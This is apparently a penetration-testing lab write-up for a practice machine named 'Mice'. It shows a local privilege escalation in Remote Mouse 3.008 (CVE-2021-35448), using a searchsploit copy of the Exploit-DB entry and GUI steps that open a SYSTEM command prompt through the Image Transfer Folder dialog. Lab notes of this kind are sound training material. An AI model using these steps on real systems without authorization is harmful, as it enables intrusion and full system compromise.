CVE-2021-35448
RDP session has been established
The version information of the target remotemouse instance has been confirmed through a successful exploitation of the arbitrary remote command execution. The instance also suffers from a local privilege escalation vulnerability. Given the instance is running with privileges of SYSTEM, successful exploitation would lead to Privilege Escalation
/Practice/Mice/5-Privilege_Escalation/attachments/{47B82AAE-C01C-435D-A011-C55041EAC522}.png)
A vulnerability classified as problematic was found in Emote Interactive Remote Mouse 3.008 on Windows. Affected by this vulnerability is an unknown code block of the component Image Transfer Handler. As an impact it is known to affect confidentiality, integrity, and availability.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ searchsploit -m windows/local/50047.txt ; mv 50047.txt CVE-2021-35448.txt
Exploit: Remote Mouse GUI 3.008 - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/50047
Path: /usr/share/exploitdb/exploits/windows/local/50047.txt
Codes: CVE-2021-35448
Verified: True
File Type: ASCII text
Copied to: /home/kali/PEN-200/PG_PRACTICE/mice/50047.txt
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mice]
└─$ cat CVE-2021-35448.txt
# Exploit Title: Remote Mouse GUI 3.008 - Local Privilege Escalation
# Exploit Author: Salman Asad (@deathflash1411) a.k.a LeoBreaker
# Date: 17.06.2021
# Version: Remote Mouse 3.008
# Tested on: Windows 10 Pro Version 21H1
# Reference: https://deathflash1411.github.io/blog/cve-2021-35448
# CVE: CVE-2021-35448
Steps to reproduce:
1. Open Remote Mouse from the system tray
2. Go to "Settings"
3. Click "Change..." in "Image Transfer Folder" section
4. "Save As" prompt will appear
5. Enter "C:\Windows\System32\cmd.exe" in the address bar
6. A new command prompt is spawned with Administrator privileges Exploit locally available
Exploitation
/Practice/Mice/5-Privilege_Escalation/attachments/{0C6A37F4-A70A-43CA-AF1D-97A18B1DEBE0}.png)
Opening up the target remotemouse instance from the system tray
/Practice/Mice/5-Privilege_Escalation/attachments/Pasted-image-20250417225206.png)
/Practice/Mice/5-Privilege_Escalation/attachments/Pasted-image-20250417225420.png)
Changing the value in the “Image Transfer Folder” section to C:\Windows\System32\cmd.exe
/Practice/Mice/5-Privilege_Escalation/attachments/{2193C9C2-79B8-433B-89D2-129E74618F79}.png)
System level compromise